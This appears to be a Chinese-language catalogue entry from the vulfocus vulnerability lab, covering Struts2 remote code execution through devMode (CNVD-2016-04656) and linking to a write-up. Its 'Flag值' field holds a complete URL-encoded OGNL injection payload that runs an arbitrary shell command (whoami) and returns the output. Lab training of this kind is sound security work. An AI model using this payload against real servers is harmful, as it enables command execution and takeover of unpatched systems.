| ID: | 16819 |
|---|---|
| 标题: | struts2 代码执行 (CNVD-2016-04656) |
| 描述: | struts2 代码执行 (CNVD-2016-04656) vulfocus/struts2-cnvd_2016_04656:latest Struts2是第二代基于Model-View-Controller(MVC)模型的java企业级web应用框架,并成为当时国内外较为流行的容器软件中间件。为了便于开发人员调试程序,Struts2提供了devMode模式,可以方便查看程序错误以及日志等信息。 该漏洞产生的原因是由于开启了devMode模式且Apache Struts 2官方以往修复措施未完善(溯及S2-008漏洞),远程攻击者利用该漏洞可执行任意命令,进而控制服务器主机。 |
| 类型: | WEB |
| 网站: | vulfocus |
| 题目链接: | https://vulfocus.cn |
| 赛事: | None |
| 年度: | None |
| Flag值: | struts2 代码执行 (CNVD-2016-04656)%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23process%3D@java.lang.Runtime@getRuntime().exec(%23parameters.command),%23ros%3D(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())%2C@org.apache.commons.io.IOUtils@copy(%23process.getInputStream()%2C%23ros)%2C%23ros.flush(),%23xx%3d123,%23xx.toString.json?&command=whoami |
| writeup: | https://blog.csdn.net/m0_62063669/article/details/126803442 |